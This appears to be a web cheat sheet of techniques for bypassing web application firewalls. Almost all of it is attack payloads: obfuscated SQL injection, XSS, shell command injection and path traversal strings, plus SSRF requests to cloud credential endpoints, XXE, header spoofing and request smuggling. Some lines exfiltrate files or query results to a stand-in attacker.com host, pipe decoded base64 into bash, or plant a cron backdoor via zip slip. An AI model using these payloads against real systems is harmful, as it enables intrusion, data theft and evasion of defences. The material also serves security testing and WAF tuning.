BinaryShield // WAF Bypass Techniques

🔎

WAF FINGERPRINTING

Identify which WAF is in place before attempting bypasses. Different WAFs have different rule sets.

▾

Detect WAF Passively

// Check response headers — Server: cloudflare / x-sucuri-id / X-Powered-By-Plesk curl -I https://target.com

// Check cookies — WAF-specific cookie names reveal vendor Look for: __cfduid, sucuri_cloudproxy_uuid, XXXXXX_waf

// Check error pages — Custom block page = WAF present Send ' OR 1=1-- to login form

// Check server header — Server: cloudflare / AkamaiGHost / BigIP curl -v https://target.com 2>&1 | grep -i server

Active WAF Detection Tools

// wafw00f basic — Detect WAF vendor automatically wafw00f https://target.com

// wafw00f all checks — -a = try all WAF fingerprints, not just first match wafw00f -a https://target.com

// wafw00f verbose — Show all HTTP exchange details wafw00f -v https://target.com

// nmap WAF detection — NSE WAF detection script nmap --script http-waf-detect -p 80,443 target.com

// nmap WAF fingerprint — NSE WAF identification nmap --script http-waf-fingerprint -p 80,443 target.com

Common WAF Identifiers

// Cloudflare — Most common CDN+WAF Response header: cf-ray / server: cloudflare

// ModSecurity — Open-source WAF Response: 406 Not Acceptable / 403 with mod_security header

// AWS WAF — Cloud WAF X-AMZ headers / response from amazonaws.com

// Akamai — Enterprise CDN+WAF X-Check-Cacheable header / akamai error pages

// F5 BIG-IP ASM — Hardware WAF BigIP cookie / TS01[random] cookie pattern

// Sucuri — Website security WAF X-Sucuri-ID header / sucuri block page

// Imperva Incapsula — Enterprise WAF incap_ses cookie / visid_incap cookie

// Barracuda — Network WAF BNSF cookie / Barracuda Networks block page

🔢

ENCODING BYPASSES

WAFs inspect decoded input. Encoding payloads in various formats can prevent the WAF from matching its rules while the backend still processes them.

▾

URL Encoding

// Single URL encode — Most WAFs decode once before inspecting ' = %27 < = %3C > = %3E / = %2F space = %20

// Double URL encode — WAF decodes once to %27, backend decodes again to ' ' = %2527 < = %253C > = %253E

// Partial encode — Partial encoding confuses some pattern matchers <script> = %3Cscript>

// Plus sign space — + treated as space in URL query strings SELECT+1+FROM+users

// Tab as space — Tab (0x09) often treated as whitespace by DB SELECT%09FROM%09users

// Newline bypass — Newline chars split keyword detection %0aUNION%0aSELECT

// Carriage return — CR character as token separator %0dSELECT%0dFROM

Unicode / UTF-8 Encoding

// Unicode quote — HTML entity single quote ' or '

// Unicode lt/gt — HTML entity < and > < >

// UTF-8 overlong — Old parsers accept non-standard encodings / = %c0%af (overlong UTF-8)

// Unicode fullwidth — Full-width ASCII chars may bypass keyword filters ａｌｅｒｔ (fullwidth Latin)

// Cyrillic lookalikes — Homograph attack on rule matching а = Cyrillic a е = Cyrillic e

// Unicode escapes in JS — JavaScript processes Unicode escapes \u0073cript = script \u0061lert = alert

// HTML entity mix — Partial HTML encoding <script> mixed with raw chars

Base64 / Other Encodings

// Base64 SQLi — Some apps decode base64 params '+OR+1=1-- base64: JyBPUiAxPTEtLQ==

// Hex encoding in SQL — MySQL accepts hex string literals 0x73656c656374 = SELECT in hex

// MySQL hex values — Hex bypasses string comparison filters SELECT 0x61646d696e = SELECT 'admin'

// HTML entity in attribute — Decimal HTML entities <img src=x onerror=alert(1)>

// Base64 in data URI — Base64 encoded HTML in data URI <img src='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='>

🔡

CASE & KEYWORD MANIPULATION

WAFs often use case-sensitive or naive keyword matching. Altering keyword case, splitting them, or using equivalent functions defeats simple pattern rules.

▾

Case Variation

// Mixed case SQLi — Most DBs are case-insensitive for keywords SeLeCt * FrOm UsErS

// Mixed case XSS — HTML parser is case-insensitive <ScRiPt>alert(1)</ScRiPt>

// Mixed case command — Shell may interpret mixed case CaT /etc/passwd WhoAmI

// Random case — Defeats naive UNION SELECT regex uNiOn SeLeCt NuLl,NuLl--

// Alternate upper/lower — Some WAFs fail on alternating patterns AlTeRnAtInG CaSe

Keyword Splitting & Concatenation

// SQL string concat (MySQL) — Comment splits keyword across tokens SEL/**/ECT UN/**/ION

// SQL string concat (MSSQL) — String concatenation rebuilds keyword SE'+'LECT UN'+'ION

// SQL concat function — Build keywords from hex chars CONCAT(0x73,0x65,0x6c,0x65,0x63,0x74) = SELECT

// Nested comments — MySQL versioned comments execute on matching version /*!SELECT*/ /*!50000SELECT*/

// Scientific notation — Some parsers accept 1e0 as number 1 1e0UNION SELECT 1

// Inline comment split — Comments as whitespace SELECT/*bypass*/username/**/FROM/**/users

Equivalent Functions & Alternatives

// SUBSTR alternatives — All extract substrings in MySQL SUBSTRING() MID() SUBSTR()

// SLEEP alternatives — Time-based SQLi without SLEEP keyword SLEEP(5) BENCHMARK(10000000,SHA1(1))

// IF alternatives — Conditional without IF keyword IF(1=1,1,0) IIF(1=1,1,0) (MSSQL)

// CHAR() for strings — Build string from char codes CHAR(115,101,108,101,99,116) = 'select'

// alert() alternatives — XSS without alert keyword confirm(1) prompt(1) console.log(1)

// eval alternatives — JS execution without eval Function('alert(1)')() setTimeout('alert(1)',0)

// document.cookie alt — Property access via bracket notation window['document']['cookie'] this['cookie']

📄

COMMENT & WHITESPACE INJECTION

SQL and HTML parsers treat certain characters as whitespace or ignore comments entirely. Injecting them inside keywords breaks WAF string matching.

▾

SQL Comment Types

// Inline comment (all DBs) — /**/ treated as space in SQL SELECT/**/username/**/FROM/**/users

// MySQL inline comment — /*! */ = MySQL executable comment SELECT/*!username*/FROM users

// MySQL versioned — Executes only if MySQL >= 5.0.0 SELECT /*!50000username*/ FROM users

// Single line comment — -- comments out rest of query SELECT username FROM users--

// Hash comment (MySQL) — # is MySQL single-line comment SELECT username FROM users#

// Multi-space — Multiple spaces between keywords SELECT%20%20%20username%20FROM%20users

// Nested inline — Comments inside keyword tokens SE/**/LE/**/CT

Whitespace Alternatives

// Tab character — Tab as space in SQL queries %09 (0x09)

// Newline — Line feed as space %0a (0x0a)

// Carriage return — Carriage return as space %0d (0x0d)

// Form feed — Form feed as whitespace %0c (0x0c)

// Vertical tab — Vertical tab as whitespace %0b (0x0b)

// Non-breaking space — Non-breaking space in some parsers %a0 (0xa0)

// NULL byte — NULL byte may split token detection %00 (before keyword)

HTML/JS Comment Tricks

// HTML comment in tag — Browser strips HTML comments <script>alert(1)</script>

// Conditional comment — IE conditional comment <![if !IE]><script>alert(1)</script><![endif]>

// JS block comment — Comments in JS ignored <script>/*bypass*/alert(1)/*end*/</script>

// JS line comment — Line comment + newline <script>//bypass\nalert(1)</script>

// Null byte in HTML — Null byte before tag %00<script>alert(1)</script>

// Reverse string — Build string without literals String.fromCharCode(116,114,101,108,97) reversed

📊

SQL INJECTION WAF BYPASS

SQLi-specific WAF bypass techniques covering detection, union-based, blind, and authentication bypass payloads.

▾

Authentication Bypass

// Classic bypass — Most basic — often blocked ' OR 1=1--

// With comment variations — Comments as spaces '/**/OR/**/1=1-- 'OR(1=1)--

// With encoding — URL-encoded whitespace '%20OR%201=1-- '%09OR%091=1--

// Double quote variant — Double quote instead of single " OR "1"="1

// No spaces version — Parentheses replace spaces 'OR(1)=(1)-- '||(1)=(1)--

// Scientific bypass — Scientific notation for numbers 0'OR(1e0)=(1e0)--

// Null byte version — Null byte to confuse tokenizer '%00OR'1'='1

// Hex value — Hex encoded condition 'OR 0x313d31-- (0x313d31 = '1=1')

// Case + comment — Mixed case with comment whitespace 'Or/**/1/**/=/**/1--

// Nested query — Subquery in condition ' OR (SELECT 1 FROM dual WHERE 1=1)--

UNION SELECT Bypasses

// Comments in UNION — Split keywords with comments UN/**/ION/**/SE/**/LECT NULL--

// Case variation — Random case UNION SELECT uNiOn SeLeCt null,null,null--

// URL encoded — # then newline as whitespace UNION%23%0ASELECT%23%0Anull--

// Scientific float — Float prefix on UNION 1.0UNION SELECT null--

// /*!UNION*/ version — MySQL executable comments /*!UNION*//*!SELECT*/ null--

// Line feed version — Newline as space UNION%0ASELECT%0Anull--

// Plus sign — Plus as space in URL UNION+SELECT+null+FROM+users--

// Parentheses — Wrapped in parentheses (UNION)(SELECT)(null)--

// Double negation — Negative number forces error row -1+UNION+SELECT+1,2,3--

// Inline comment padding — Padding inside columns UNION SELECT/*aaaa*/null/*bbbb*/,null--

Blind SQLi Bypasses

// SLEEP bypass (BENCHMARK) — Heavy CPU = time delay without SLEEP AND BENCHMARK(10000000,SHA1(1))--

// Conditional timing — Conditional time delay AND IF(1=1,SLEEP(5),0)--

// Heavy query blind — Cartesian product for delay AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B)--

// Boolean with encoding — Hex-encoded boolean AND 0x313d31-- (0x313d31 = 1=1)

// Error-based OOB — Error message exfil AND extractvalue(1,concat(0x7e,(SELECT version())))--

// DNS exfil (MySQL) — OOB via LOAD_FILE UNC path AND LOAD_FILE(concat(0x5c5c,(SELECT hex(version())),0x2e,0x61,0x74,0x74,0x61,0x63,0x6b,0x65,0x72,0x2e,0x63,0x6f,0x6d,0x5c,0x61))--

// Time via regex — SLEEP inside subquery AND (SELECT * FROM (SELECT(SLEEP(5)))a)--

SQLmap WAF Tamper Scripts

// Space to comment — Replaces space with /**/ comment sqlmap --tamper=space2comment

// Random case — Randomizes keyword letter case sqlmap --tamper=randomcase

// Charencode — URL-encodes all characters sqlmap --tamper=charencode

// Chardoubleencode — Double URL-encodes all chars sqlmap --tamper=chardoubleencode

// Between tamper — Replaces > with NOT BETWEEN 0 AND sqlmap --tamper=between

// Equaltolike — Replaces = with LIKE operator sqlmap --tamper=equaltolike

// Space2dash — Replaces space with -- and newline sqlmap --tamper=space2dash

// Combine tampers — Stack multiple tampers sqlmap --tamper=space2comment,randomcase,charencode

// HTMLencode — HTML-encodes payload sqlmap --tamper=htmlencode

// Apostrophemask — Replaces ' with %EF%BC%87 (fullwidth) sqlmap --tamper=apostrophemask

📹

XSS WAF BYPASS

XSS payloads that bypass common WAF signatures using event handlers, encoding, alternative tags, and context manipulation.

▾

Tag & Attribute Bypasses

// SVG onload — SVG often missed by WAFs looking for <script> <svg onload=alert(1)>

// SVG/animate — SVG animation events <svg><animate onbegin=alert(1) attributeName=x></animate></svg>

// Details tag — HTML5 details ontoggle event <details open ontoggle=alert(1)>

// Input autofocus — Focus event without user interaction <input autofocus onfocus=alert(1)>

// Video source — onerror on video source <video><source onerror=alert(1)>

// Img onerror — Classic — try variations if blocked <img src=x onerror=alert(1)>

// Body onpageshow — Page lifecycle event <body onpageshow=alert(1)>

// Marquee — Legacy HTML element <marquee onstart=alert(1)>

// Object data — Object tag with JS protocol <object data=javascript:alert(1)>

// Iframe srcdoc — Nested HTML in srcdoc <iframe srcdoc='<img src=x onerror=alert(1)>'>

// Math element — MathML namespace <math><a xlink:href=javascript:alert(1)>click</a></math>

// Base href — Base tag JS URL <base href=javascript:/a/-alert(1)//>

Event Handler Bypasses

// onmouseover — Mouse event — common on links <a onmouseover=alert(1)>hover</a>

// onclick — Click event handler <a onclick=alert(1)>click</a>

// onpointerdown — HTML5 pointer event <x onpointerdown=alert(1)>click</x>

// onpointerenter — Pointer enter event <x onpointerenter=alert(1)>hover</x>

// ontouchstart — Mobile touch event <x ontouchstart=alert(1)>touch</x>

// onauxclick — Middle/right click event <x onauxclick=alert(1)>right-click</x>

// oncut/oncopy — Clipboard events <x oncut=alert(1) contenteditable>select and cut</x>

// ondrag — HTML5 drag events <x ondragstart=alert(1) draggable=true>drag me</x>

// onfullscreenchange — Fullscreen API event <x onfullscreenchange=alert(1) onclick=this.requestFullscreen()>click</x>

Encoding Bypasses for XSS

// HTML decimal entities — Decimal HTML entities in handler <img src=x onerror=alert(1)>

// HTML hex entities — Hex HTML entities <img src=x onerror=alert(1)>

// JS Unicode escapes — Unicode in JS context <script>\u0061\u006c\u0065\u0072\u0074(1)</script>

// JS hex escapes — Hex escapes in JS <script>\x61\x6c\x65\x72\x74(1)</script>

// String.fromCharCode — Build string from char codes <script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

// atob base64 — atob() decodes base64 at runtime <script>eval(atob('YWxlcnQoMSk='))</script>

// Template literals — Template literal execution <script>`${alert(1)}`</script>

// Reversed string — Reversed payload string <script>var x='(1)trelA';eval(x.split('').reverse().join(''))</script>

WAF-Specific XSS Bypasses

// Broken tag — Extra < confuses some WAFs <<script>alert(1)</script>

// Extra angle brackets — Nested broken tags <scr<ipt>alert(1)</scr</ipt>ipt>

// Null byte in tag — Null byte before tag %00<script>alert(1)</script>

// Backtick attribute — Backtick instead of quote <img src=`x` onerror=alert(1)>

// No quotes — Unquoted attribute value <img src=x onerror=alert(1)>

// Mixed quotes — Quote confusion <img src='x" onerror=alert(1) x='

// Capitalized tag — All caps tag name <SCRIPT>alert(1)</SCRIPT>

// Script in attribute — Mixed case event handler <img src=1 onError=alert(1)>

// Space before = — Spaces around = in attribute <img src =x onerror= alert(1)>

// Tab in tag — Tab instead of space in tag <img src=x onerror=alert(1)>

// Newline in tag — Newline inside HTML tag <img src=x onerror=alert(1)>

// Slash in tag — Slash as attribute separator <img/src=x/onerror=alert(1)>

⚠

COMMAND INJECTION WAF BYPASS

OS command injection bypass techniques for applications that pass input to shell commands.

▾

Command Separators

// Semicolon — Standard command separator ; id

// Pipe — Pipe output to next command | id

// AND — Execute if previous succeeded && id

// OR — Execute if previous failed || id

// Backtick — Command substitution (older bash) `id`

// Dollar parens — Command substitution (modern bash) $(id)

// Newline — Newline as command separator %0a id

// Null byte — Null byte + semicolon %00; id

Keyword Bypass Techniques

// Quote insertion — Single quotes split but ignored by shell c'a't /etc/passwd w'h'o'a'm'i

// Double quotes — Double quotes also ignored by shell c"a"t /etc/passwd

// Backslash — Backslash line continuation ignored c\at /etc/passwd wh\oami

// Variable expansion — $IFS = internal field separator (space/tab) $IFS$9cat$IFS/etc/passwd

// Brace expansion — Bash brace expansion without spaces {cat,/etc/passwd}

// Base64 decode — Execute base64-encoded command $(echo Y2F0IC9ldGMvcGFzc3dk|base64 -d|bash)

// Hex decode — printf hex then execute $(printf '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64')

// Environment vars — Reference env vars for path $PATH — use known binaries

// Wildcards — ? wildcard matches single char /???/c?t /etc/p?sswd

// Glob patterns — Character class glob /bin/c[a]t /etc/passwd

Linux Specific

// IFS bypass — IFS as space replacement cat$IFS/etc/passwd

// Redirect input — Input redirect without space cat</etc/passwd

// Here string — Here string as input cat<<<$(id)

// Readonly IFS — Custom IFS with whitespace chars X=$'\t\n\r';IFS=$X;cat${IFS}/etc/passwd

// env command — Prefix with env command env id env cat /etc/passwd

// Shell expansion — Substring expansion for / ${HOME:0:1} /bin${HOME:0:1}sh

// History expansion — Bash history expansion !cat !! (repeat last)

Windows Specific

// CMD separator — Windows command separators & whoami | whoami || whoami

// Caret escape — Caret ^ is escape char in CMD (ignored) w^h^o^a^m^i

// Percent expansion — Use env vars to hide keywords %ComSpec% /c whoami

// PowerShell bypass — Caret in PowerShell command name pow^ers^hell -c whoami

// Env var split — Split command across variables set X=whoami && call %X%

// Alternatedata stream — NTFS alternate data stream cmd.exe /c more < file.txt:hidden.txt

📁

PATH TRAVERSAL WAF BYPASS

Bypass WAF rules on directory traversal using encoding, case variation, and path normalization tricks.

▾

Basic Traversal Variants

// Basic — Often blocked outright ../../../etc/passwd

// URL encoded — Single URL encode / ..%2F..%2F..%2Fetc%2Fpasswd

// Double URL encoded — Double encode — %2F -> %252F ..%252F..%252F..%252Fetc%252Fpasswd

// Mixed encode — Mix raw / with encoded %2f ..%2f../..%2fetc%2fpasswd

// Backslash — Windows path separator ..\..\..\etc\passwd ..\..\../etc/passwd

// Encoded backslash — %5C = URL encoded backslash ..%5C..%5C..%5Cetc%5Cpasswd

// Dot encode — %2e = URL encoded dot %2e%2e/%2e%2e/%2e%2e/etc/passwd

// Double dot encode — All chars encoded %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Normalization Bypass

// Extra dots — Four dots + // — reduces to ../ ....//....//....//etc/passwd

// Repeated slashes — Extra slashes normalized away ..///../..///../etc/passwd

// Mixed slashes — Mixed path separators ../\../\../etc/passwd

// Null byte — Null byte truncates extension check ../../../etc/passwd%00.jpg

// Unicode dots — %c0%af = overlong UTF-8 / ..%c0%af..%c0%afetc%c0%afpasswd

// UTF-16 slash — %u2215 = Unicode division slash ..%u2215..%u2215etc%u2215passwd

// Absolute path — Direct absolute path /etc/passwd

// URL scheme — Protocol-based path file:///etc/passwd

Context-Specific Bypasses

// With prefix strip — Bypass that strips only once ....//....//etc/passwd (if app strips ../)

// PHP filters — PHP wrapper bypass php://filter/convert.base64-encode/resource=../../../etc/passwd

// Zip slip — Archive path traversal ../../../etc/cron.d/backdoor (in zip filename)

// Case on Windows — Windows case-insensitive paths ../../../WINDOWS/win.ini ..\..\..\..\

🌐

SSRF WAF BYPASS

Server-side request forgery bypass techniques to access internal networks and cloud metadata endpoints.

▾

IP Address Encoding

// Decimal IP — Decimal representation of 127.0.0.1 http://2130706433/

// Octal IP — Octal representation http://0177.0.0.1/

// Hex IP — Hex representation of 127.0.0.1 http://0x7f000001/

// IPv6 loopback — IPv6 localhost http://[::1]/ http://[::ffff:127.0.0.1]/

// IPv6 mapped — IPv6 mapped IPv4 http://[::ffff:7f00:1]/

// Mixed notation — Mixed decimal/hex octets http://127.0.0.0x1/ http://0x7f.0.0.1/

// URL encoding — URL-encoded dots in IP http://127%2e0%2e0%2e1/

// Unicode dots — Unicode fullwidth period http://127。0。0。1/

URL Bypass Techniques

// Open redirect chain — Use app's open redirect to reach internal /redirect?url=http://169.254.169.254/

// Subdomain bypass — DNS points to metadata IP http://169.254.169.254.attacker.com/ → points to 169.254.169.254

// DNS rebinding — Rebinding service for bypass http://1u.ms/169.254.169.254/

// URL fragment — Fragment may be stripped http://attacker.com/ssrf#http://169.254.169.254/

// Credentials in URL — @ separates credentials http://attacker@169.254.169.254/

// URL path bypass — # in URL confuses parser http://169.254.169.254%23.attacker.com/

// CRLF in URL — CRLF injection in redirect http://169.254.169.254/%0d%0aHost: attacker.com

// Whitespace in URL — Space in URL — some parsers strip it http:// 169.254.169.254/

Protocol Schemes

// file:// protocol — Read local files file:///etc/passwd

// dict:// protocol — Redis via dict protocol dict://127.0.0.1:6379/info

// gopher:// protocol — Redis/SMTP via gopher gopher://127.0.0.1:6379/_INFO%0D%0A

// ftp:// protocol — FTP internal service ftp://127.0.0.1:21/

// sftp:// protocol — SFTP callback sftp://attacker.com:11111/

// ldap:// protocol — LDAP internal access ldap://127.0.0.1:389/

// tftp:// protocol — TFTP — UDP based tftp://attacker.com/file

// jar:// scheme — Java JAR protocol jar:http://attacker.com/evil.jar!/

Cloud Metadata Endpoints

// AWS standard — AWS instance metadata http://169.254.169.254/latest/meta-data/

// AWS IMDSv2 — AWS IAM role credentials http://169.254.169.254/latest/meta-data/iam/security-credentials/

// AWS via IPv6 — AWS IPv6 metadata endpoint http://[fd00:ec2::254]/latest/meta-data/

// GCP standard — GCP metadata (requires header) http://metadata.google.internal/computeMetadata/v1/

// GCP IP direct — GCP via standard IP http://169.254.169.254/computeMetadata/v1/

// Azure — Azure IMDS http://169.254.169.254/metadata/instance?api-version=2021-02-01

// DigitalOcean — DO metadata http://169.254.169.254/metadata/v1/

// Oracle Cloud — Oracle Cloud metadata http://169.254.169.254/opc/v1/instance/

📄

XXE WAF BYPASS

XML External Entity bypass techniques when WAFs block standard XXE payloads.

▾

Encoding Bypasses

// UTF-16 encoding — Switch to UTF-16 encoding <?xml version='1.0' encoding='UTF-16'?>

// UTF-7 encoding — UTF-7 may bypass UTF-8 rule <?xml version='1.0' encoding='UTF-7'?>

// IBM EBCDIC — EBCDIC encoding bypass <?xml version='1.0' encoding='IBM037'?>

// ASCII encoding — Explicit ASCII declaration <?xml version='1.0' encoding='US-ASCII'?>

Entity Type Bypasses

// Parameter entities — Use parameter (%) instead of general entities <!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://attacker.com/evil.dtd'>%xxe;]>

// Nested parameter — Nested parameter entity <!DOCTYPE foo [<!ENTITY % a '<!ENTITY b SYSTEM "http://attacker.com/">'>%a;]>&b;

// DTD via parameter — Split payload to bypass inline rule External DTD hosts the actual payload, inline just loads it

// Error-based XXE — Error message leaks file content <!DOCTYPE foo [<!ENTITY % a SYSTEM 'file:///etc/passwd'><!ENTITY % b '<!ENTITY c SYSTEM "file://%a">'>%b;]>&c;

// Blind OOB XXE — Out-of-band data exfiltration <!ENTITY % file SYSTEM 'file:///etc/passwd'><!ENTITY % exfil '<!ENTITY send SYSTEM "http://attacker.com/?x=%file;">'>

WAF Evasion Variations

// Whitespace in DOCTYPE — Newlines in DOCTYPE <!DOCTYPE foo [

// Tab in entity — Tabs in entity definition <!ENTITY xxe SYSTEM 'file:///etc/passwd'>

// CDATA bypass — CDATA wrapping <![CDATA[<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]]>

// SVG XXE — XXE inside SVG upload <svg xmlns='http://www.w3.org/2000/svg'><?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><text>&xxe;</text></svg>

// XLSX XXE — XXE via Office file Unzip > edit xl/workbook.xml > inject XXE > rezip

// XInclude — XInclude instead of external entity <foo xmlns:xi='http://www.w3.org/2001/XInclude'><xi:include href='file:///etc/passwd' parse='text'/></foo>

📡

HTTP HEADER & PROTOCOL BYPASS

WAFs inspect specific headers and HTTP protocol features. Manipulating these at the protocol level can bypass inspection.

▾

Header Manipulation

// X-Forwarded-For spoofing — Spoof source IP as localhost X-Forwarded-For: 127.0.0.1

// X-Real-IP spoofing — Alternate IP header X-Real-IP: 127.0.0.1

// X-Originating-IP — Another IP override header X-Originating-IP: 127.0.0.1

// X-Custom-IP-Authorization — App-specific IP header X-Custom-IP-Authorization: 127.0.0.1

// True-Client-IP — CDN passthrough header True-Client-IP: 127.0.0.1

// Cluster-Client-IP — Nginx cluster header Cluster-Client-IP: 127.0.0.1

// CF-Connecting-IP — Cloudflare origin header CF-Connecting-IP: 127.0.0.1

// X-Host injection — Host override for SSRF/open redirect X-Host: evil.com

// X-Forwarded-Host — Proxy forwarded host X-Forwarded-Host: evil.com

Content-Type Manipulation

// JSON to XML switch — Switch format to avoid JSON rules Change Content-Type: application/json to application/xml

// XML to JSON switch — Same bypass in opposite direction Reverse for XML rules

// Multipart bypass — WAFs may not parse multipart Wrap payload in multipart/form-data body

// Form urlencoded — Standard form encoding application/x-www-form-urlencoded with encoded payload

// text/xml vs application/xml — Some WAFs only check one Try both content types

// Missing content-type — WAF may skip inspection if type unknown Remove Content-Type header entirely

// Wrong content-type — Mismatch — WAF checks text/plain rules Send JSON with Content-Type: text/plain

HTTP Method Bypass

// Method switching — WAF rules may differ per method Try POST instead of GET (same payload)

// HEAD request — Check if HEAD bypasses GET restrictions HEAD /admin

// OPTIONS request — CORS preflight — may bypass body inspection OPTIONS / HTTP/1.1

// Override header — Method override for firewalls blocking verbs X-HTTP-Method-Override: GET (with POST)

// Custom method — Some WAFs only inspect GET/POST FUZZ / HTTP/1.1

HTTP Version & Protocol

// HTTP/2 downgrade — HTTP/1.0 vs HTTP/1.1 parsing differences Use HTTP/1.0 in request

// Chunked encoding — Payload split between chunks Transfer-Encoding: chunked with payload split across chunks

// Content-Length mismatch — Front-end/back-end desync Send smaller Content-Length than actual body

// TE.CL smuggling — HTTP request smuggling Transfer-Encoding: chunked + smaller Content-Length

// Pipeline bypass — WAF may only inspect first request Send multiple requests pipelined

// Long URL — Exceed WAF inspection buffer Add 2000+ chars of junk before payload in query string

// Large body — WAF may stop inspecting after X bytes Send payload deep into a large POST body

☁

CLOUDFLARE SPECIFIC BYPASS

Cloudflare-specific WAF bypass techniques. Find origin IP to bypass Cloudflare entirely, or use payload variations to pass its rules.

▾

Find Origin IP (Bypass Entirely)

// Historical DNS — Origin may have been exposed before CF Check SecurityTrails / VirusTotal old DNS records

// MX record leak — Mail server may be on same IP dig MX target.com

// SPF record — SPF may list origin IP dig TXT target.com | grep spf

// Subdomain not behind CF — dev.target.com, staging.target.com Check all subdomains for direct IP

// shodan cert search — Find server by TLS cert shodan search ssl.cert.subject.cn:target.com

// censys cert search — Same via Censys https://search.censys.io/certificates?q=parsed.subject.common_name%3Atarget.com

// SSL cert transparency — Old/admin certs may reveal real IP Check crt.sh for all certs — some may show origin

// Email headers — Origin server may appear in Received headers Request password reset — look at email headers

Cloudflare WAF Rule Bypasses

// CF bypass via TLS 1.3 — Some CF rules differ on TLS version Use HTTP client with TLS 1.3 only

// CF IP headers — Spoof as Cloudflare IP X-Forwarded-For: [CF IP range]

// CF-ray header removal — Direct origin access simulation Some backends trust requests without cf-ray

// Uppercase HTTP method — CF normalizes but backend may not GET vs get — case variation

// JSON float notation — Float vs integer parsing difference {'id':1.0}

// Null byte in JSON — Null in JSON string value {'cmd':'wh\u0000oami'}

// Duplicate params — CF may check first, backend uses last ?q=safe&q=PAYLOAD

// HPP bypass — Array notation in params ?param[]=value&param[]=PAYLOAD

🛡

MODSECURITY BYPASS

ModSecurity with OWASP CRS is the most common open-source WAF. These techniques target its rule patterns specifically.

▾

OWASP CRS Evasion

// Bypass SQL keyword — Random case defeats lowercase regex SeLeCt — CRS checks lowercase patterns

// Score below threshold — CRS uses scoring — stay below block threshold Craft payload that scores below anomaly threshold

// Divide across params — Split SQL across multiple parameters ?a=UNION&b=SELECT&c=1,2,3

// Use WHERE instead of OR — WHERE less flagged than OR in auth bypass ' WHERE 1=1-- instead of ' OR 1=1--

// Avoid comment chars — -- often triggers rules Use whitespace alternatives instead of --

// Use LIMIT instead of TOP — Fewer rules on LIMIT keyword MySQL LIMIT vs MSSQL TOP

ModSecurity Header Tricks

// Bypass via OPTIONS — Pre-flight bypass OPTIONS request often has fewer rules

// Content-Type bypass — Wrong content type skips form rules text/html instead of application/x-www-form-urlencoded

// Chunked encoding — Split payload across chunks Transfer-Encoding: chunked

// Large cookie — Buffer overflow in header inspection Send payload inside oversized cookie header

// Multipart payload — Multipart parsing differences Wrap SQLi in multipart form data

🔧

WAF BYPASS TOOLS

Tools specifically designed for WAF fingerprinting, evasion testing, and automated bypass discovery.

▾

Fingerprinting

// wafw00f — Detect WAF vendor from responses wafw00f https://target.com

// wafw00f all — Try all fingerprints wafw00f -a https://target.com

// nmap waf detect — NSE WAF detection nmap --script http-waf-detect,http-waf-fingerprint -p 80,443 target.com

// nuclei waf detect — Nuclei WAF templates nuclei -u https://target.com -t technologies/waf/

Bypass Testing

// sqlmap tampers — Multiple tamper scripts sqlmap -u 'URL' --tamper=space2comment,randomcase,charencode

// SQLMap list tampers — List all available tamper scripts sqlmap --list-tampers

// dalfox WAF evasion — XSS with WAF bypass mode dalfox url 'URL' --waf-evasion

// XSStrike WAF — Fuzzer mode for WAF bypass python3 xsstrike.py -u 'URL' --fuzzer

// ffuf WAF bypass — Fuzz for WAF bypass payloads ffuf -u 'URL?id=FUZZ' -w bypass_payloads.txt -fc 403

// Burp active scan — Active scan with bypass techniques Right-click > Extensions > Active Scan++ > Scan

// 403 bypass tool — Automated 403 page bypass 403bypasser -u https://target.com/admin

// bypass-403 — Headers + path manipulation for 403 python3 bypass-403.py -u https://target.com/admin

Payload Lists

// PayloadsAllTheThings — Comprehensive payload repository https://github.com/swisskyrepo/PayloadsAllTheThings

// SecLists WAF — WAF bypass wordlists https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/WAF

// WAFNinja — Automated WAF evasion tool https://github.com/khalilbijjou/WAFNinja

// GoTestWAF — WAF testing framework by Wallarm https://github.com/wallarm/gotestwaf

// waf-bypass — Awesome WAF collection https://github.com/0xInfection/Awesome-WAF

// FuzzDB — Fuzzing payload database https://github.com/fuzzdb-project/fuzzdb

WAF BYPASS TECHNIQUES